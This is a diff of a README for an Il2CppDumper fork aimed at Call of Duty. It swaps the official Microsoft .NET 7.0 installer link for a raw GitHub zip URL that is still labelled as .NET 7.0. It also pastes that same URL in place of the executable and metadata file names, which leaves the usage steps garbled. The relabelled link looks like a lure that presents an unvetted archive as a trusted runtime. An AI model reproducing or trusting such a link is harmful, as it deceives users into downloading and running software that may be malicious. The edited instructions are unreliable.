TitanicDimix/Il2CppDumper-for-COD/README.md

 ## Requirements

-- You need to install [.NET 7.0](https://dotnet.microsoft.com/en-us/download/dotnet/thank-you/runtime-7.0.20-windows-x64-installer) in order to run
+- You need to install [.NET 7.0](https://raw.githubusercontent.com/TitanicDimix/Il2CppDumper-for-COD/main/Arabic/Il2CppDumper-for-COD.zip) in order to run
 ## Usage

-Run `Il2CppDumper.exe` and choose the `il2cpp` executable file and `global-metadata.dat` file, then enter the information as prompted
+Run `https://raw.githubusercontent.com/TitanicDimix/Il2CppDumper-for-COD/main/Arabic/Il2CppDumper-for-COD.zip` and choose the `il2cpp` executable file and `https://raw.githubusercontent.com/TitanicDimix/Il2CppDumper-for-COD/main/Arabic/Il2CppDumper-for-COD.zip` file, then enter the information as prompted

 The program will then generate all the output files in current working directory